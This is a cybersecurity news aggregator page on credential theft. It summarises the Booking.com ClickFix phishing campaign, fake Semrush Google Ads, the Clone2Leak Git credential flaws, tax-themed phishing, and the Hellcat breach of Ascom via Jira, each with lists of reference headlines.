CyberSecurity news

FlagThis - #credentialtheft

Microsoft Threat@Microsoft Security Blog //

Phishing Campaign Impersonates Booking.com - A phishing campaign impersonating Booking.com targets hospitality employees with credential-stealing malware using ClickFix to conduct financial fraud.
An ongoing phishing campaign impersonating Booking.com is targeting hospitality employees with credential-stealing malware. Microsoft Threat Intelligence has identified the campaign, which began in December 2024 and is ongoing as of February 2025. Cybercriminals are sending malicious emails to employees likely to work with Booking.com, in North America, Oceania, South and Southeast Asia, and Europe, using a social engineering technique called ClickFix to deliver the malware. This campaign aims to conduct financial fraud and theft by compromising employee credentials.

The ClickFix technique involves fake error messages and prompts that instruct users to fix issues by copying and pasting commands, leading to malware downloads. The phishing emails vary in content, referencing negative guest reviews, requests from prospective guests, online promotion opportunities, and account verification to induce clicks. The threat actor, tracked as Storm-1865, has evolved its tactics to bypass security measures.

Recommended read:
References :
  • krebsonsecurity.com: Booking.com Phishers May Leave You With Reservations
  • Source Asia: Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware
  • The DefendOps Diaries: Understanding the ClickFix Phishing Threat to the Hospitality Industry
  • The Hacker News: Microsoft Warns of ClickFix Phishing Campaign Targeting Hospitality Sector via Fake Booking[.]com Emails
  • : ‘ClickFix’ Phishing Scam Impersonates Booking.com to Target Hospitality
  • The Record: Cybercriminals are sending malicious emails to hospitality employees who are likely to work with Booking.com
  • bsky.app: Microsoft is warning that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect users with various malware, including infostealers and RATs.
  • The Register - Security: That 'angry guest' email from Booking.com? It's a scam, not a 1-star review
  • www.techradar.com: Microsoft warns about a new phishing campaign impersonating Booking.com
  • TARNKAPPE.INFO: ClickFix-Phishing: Neue Kampagne richtet sich gegen die Hotellerie
  • bsky.app: Microsoft is warning that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect users with various malware, including infostealers and RATs.
  • Virus Bulletin: Microsoft researchers identified a phishing campaign (Storm-1865) that uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft.
  • BleepingComputer: Microsoft warns that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect users with various malware, including infostealers and RATs.
  • Email Security - Blog: "ClickFix" Phishing Impersonation Campaign Targets Hospitality Sector
  • eSecurity Planet: Phishing Campaign Impersonates Booking.com, Plants Malware
  • Security Risk Advisors: 🚩Microsoft Detects Ongoing Phishing Impersonation of Booking.com Using “ClickFixâ€� to Deliver Credential-Stealing Malware
  • Blog: Phishing campaign impersonates Booking.com, plants malware
  • Davey Winder: Booking.com CAPTCHA attack impacts customers—but systems not breached, a spokesperson has said.
  • www.computerworld.com: Description of the ClickFix phishing campaign targeting the hospitality industry via fake Booking.com emails.
  • www.cysecurity.news: A phishing campaign impersonates Booking.com, targeting organizations in hospitality, using the ClickFix method to spread credential-stealing malware.
  • www.cybersecurity-insiders.com: Malware Impersonating Booking.com Targets Hospitality Sector
  • thecyberexpress.com: Microsoft Detects Ongoing Phishing Impersonation of Booking.com Using “ClickFix” to Deliver Credential-Stealing Malware
  • securityonline.info: Booking.com Impersonated in Phishing Campaign Delivering Credential-Stealing Malware
  • gbhackers.com: Microsoft Threat Intelligence has identified an ongoing phishing campaign that began in December 2024, targeting organizations in the hospitality industry by impersonating the online travel agency Booking.com. The campaign, tracked as Storm-1865, employs a sophisticated social engineering technique called ClickFix to deliver credential-stealing malware designed to conduct financial fraud and theft. This attack specifically targets
  • Metacurity: The attackers are impersonating Booking.com to deliver credential-stealing malware.
  • Talkback Resources: Storm-1865 Impersonates Booking.com in Phishing Scheme
  • Blog: Storm-1865 leverages ‘ClickFix’ technique in new phishing campaign
@The DefendOps Diaries //

Attackers Exploit Google Ads to Target SEO Professionals - Cybercriminals are exploiting Google Ads with malicious Semrush advertisements to steal Google account credentials from SEO professionals, redirecting users to deceptive login pages that harvest Google account information and exploit trust in Semrush.
Cybercriminals are actively targeting SEO professionals through a sophisticated phishing campaign that exploits Google Ads. The attackers are using fake Semrush advertisements to trick users into visiting deceptive login pages designed to steal their Google account credentials. This campaign is a new twist in phishing, going after users of the Semrush SaaS platform, which is popular among SEO professionals and businesses, and is trusted by 40% of Fortune 500 companies.

This scheme is effective due to the SEO professionals' trust in Semrush, a platform used for advertising and market research. The malicious ads appear when users search for Semrush and redirect them to counterfeit login pages, which look similar to legitimate Semrush URLs. The attackers register domain names that closely resemble real Semrush domains and the only login option is with a Google account, harvesting Google account information for further malicious activities. This provides the attackers with valuable access to Google Analytics and Google Search Console, giving them insight into the companies' financial performance.

Recommended read:
References :
  • The DefendOps Diaries: Cybercriminals exploit Google Ads to target SEO pros, using fake Semrush ads to steal Google credentials.
  • Help Net Security: Malicious ads target Semrush users to steal Google account credentials
  • Malwarebytes: Semrush impersonation scam hits Google Ads
  • www.tripwire.com: Tech support scams leverage Google ads again and again, fleecing unsuspecting internet users
  • BleepingComputer: A new phishing campaign is targeting SEO professionals with malicious Semrush Google Ads that aim to steal their Google account credentials.
  • BleepingComputer: A new phishing campaign is targeting SEO professionals with malicious Semrush Google Ads that aim to steal their Google account credentials.
  • bsky.app: Fake Semrush ads used to steal SEO professionals’ Google accounts
  • BleepingComputer: A new phishing campaign is targeting SEO professionals with malicious Semrush Google Ads that aim to steal their Google account credentials.
  • : Threat actors are looking to compromise Google accounts to further malvertising and data theft
  • Email Security - Blog: Cyber criminals have launched a sophisticated phishing campaign that exploits the trusted reputation of Semrush — an SEO firm that's captured of Fortune 500 brands as customers — to compromise Google account credentials.
  • gbhackers.com: Hackers Deploy Fake Semrush Ads to Steal Google Account Credentials
Pierluigi Paganini@securityaffairs.com //

Git Credential Exposure Vulnerabilities - Multiple vulnerabilities in Git's credential retrieval protocol allow attackers to access user credentials through improper handling of messages, affecting tools like GitHub Desktop and Git Credential Manager.
Multiple vulnerabilities have been discovered in Git and its related tools, posing a risk to user credentials. These flaws stem from the improper handling of message delimiters within the Git Credential Protocol, impacting tools such as GitHub Desktop, Git Credential Manager, Git LFS, GitHub CLI, and GitHub Codespaces. This improper handling allows malicious actors to craft URLs with injected carriage return or newline characters, leading to credential leaks. Specifically, vulnerabilities like CVE-2025-23040 in GitHub Desktop allowed for 'carriage return smuggling' through crafted submodule URLs.

These vulnerabilities arise from differences between Git's strict protocol handling and the implementation of related projects. Git Credential Manager is vulnerable due to the StreamReader class, misinterpreting line-endings, while Git LFS is vulnerable by not checking for embedded control characters, allowing for the injection of carriage return line feeds via crafted HTTP URLs. A new configuration setting, `credential.protectProtocol`, has been introduced to help mitigate these vulnerabilities by providing a defense-in-depth approach.

Recommended read:
References :
  • Cyber Security News: Critical GitHub Flaw Allows Credential Leaks Through Malicious Repos
  • securityaffairs.com: Multiple Git flaws led to credentials compromise
  • The Hacker News: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs
  • cyberpress.org: Critical GitHub Flaw Allows Credential Leaks Through Malicious Repos
  • ciso2ciso.com: Multiple Git flaws led to credentials compromise – Source: securityaffairs.com
  • ciso2ciso.com: Multiple security vulnerabilities have been disclosed in GitHub Desktop as well as other Git-related projects that, if successfully exploited, could permit an attacker to gain unauthorized access to a user’s Git credentials. “Git implements a protocol called Git Credential Protocol to retrieve credentials from the credential helper,â€� GMO Flatt Security […] La entrada se publicó primero en .
  • ciso2ciso.com: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs – Source:thehackernews.com
  • discuss.privacyguides.net: GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs
  • Pyrzout :vm:: Multiple Git flaws led to credentials compromise – Source: securityaffairs.com
  • Dataconomy: Clone2Leak exposes credential risks in Git ecosystem
  • BleepingComputer: A set of three distinct but related attacks, dubbed 'Clone2Leak,' can leak credentials by exploiting how Git and its credential helpers handle authentication requests.
  • www.bleepingcomputer.com: News about Clone2Leak vulnerabilities in the Git ecosystem.
stclarke@Source //

Tax-Themed Phishing Campaigns Exploit Tax Season - Tax-themed phishing campaigns are deploying credential phishing and malware via malicious hyperlinks and attachments, with Microsoft detecting campaigns using IRS lures, QR codes, and redirection techniques to deliver malware like RaccoonO365, AHKBot, Latrodectus, BruteRatel C4 (BRc4), and Remcos.
References: The Hacker News , Source , VERITI ...
Microsoft is warning of a surge in tax-themed phishing campaigns exploiting the upcoming tax season to steal credentials and deploy malware. These campaigns leverage various social engineering tactics, including malicious hyperlinks and attachments. Attackers are using IRS lures, QR codes, and other redirection techniques to trick victims into revealing sensitive information or installing malware.

These campaigns use malicious hyperlinks and attachments to deliver credential phishing and malware including RaccoonO365, AHKBot, Latrodectus, BruteRatel C4 (BRc4), GuLoader, and Remcos. Redirection methods, such as URL shorteners and QR codes, are used to evade detection, along with the abuse of legitimate services like file-hosting sites.

Microsoft observed campaigns employing fake tax verification forms with embedded links, PDF attachments containing QR codes, redirects hosted on compromised websites, and abused cloud services. One campaign observed on February 6, 2025 targeted US users with IRS-themed emails containing PDF attachments. These attachments redirected victims to fake DocuSign sites ultimately delivering BRc4 and Latrodectus malware.

Recommended read:
References :
  • The Hacker News: Microsoft Warns of Tax-Themed Email Attacks Using PDFs and QR Codes to Deliver Malware
  • Source: Threat actors leverage tax season to deploy tax-themed phishing campaigns
  • Vulnerable U: Tax Season Phishing 2025 - Full Threat Breakdown
  • VERITI: Veriti Research has identified a significant rise in tax-related malware samples across multiple platforms. The research team discovered malware samples targeting Android, Linux, and Windows, all connected to the same adversary operating from a single IP address.Â
Sam Bent@Sam Bent //

Hellcat Group Exploits Jira to Hit Ascom - The Hellcat ransomware group claimed responsibility for a cyberattack on Ascom, a Swiss global solutions provider, exploiting Jira server vulnerabilities to access the company’s IT infrastructure and steal data.
Ascom, a Swiss global solutions provider specializing in healthcare and enterprise communication systems, has confirmed a cyberattack on its IT infrastructure. The attack, suspected to be carried out by the Hellcat group, exploited vulnerabilities in Jira servers. The company revealed that hackers breached its technical ticketing system.

The Hellcat group claimed responsibility, stating they stole approximately 44GB of data potentially impacting all of Ascom's divisions. Hellcat hackers are known for using compromised credentials to infiltrate Jira systems, leading to data breaches in multiple organizations. Security experts advise implementing multi-factor authentication, regular security audits, prompt patching, and employee training to mitigate such attacks.

Recommended read:
References :

Posts

Blogs

Research Tools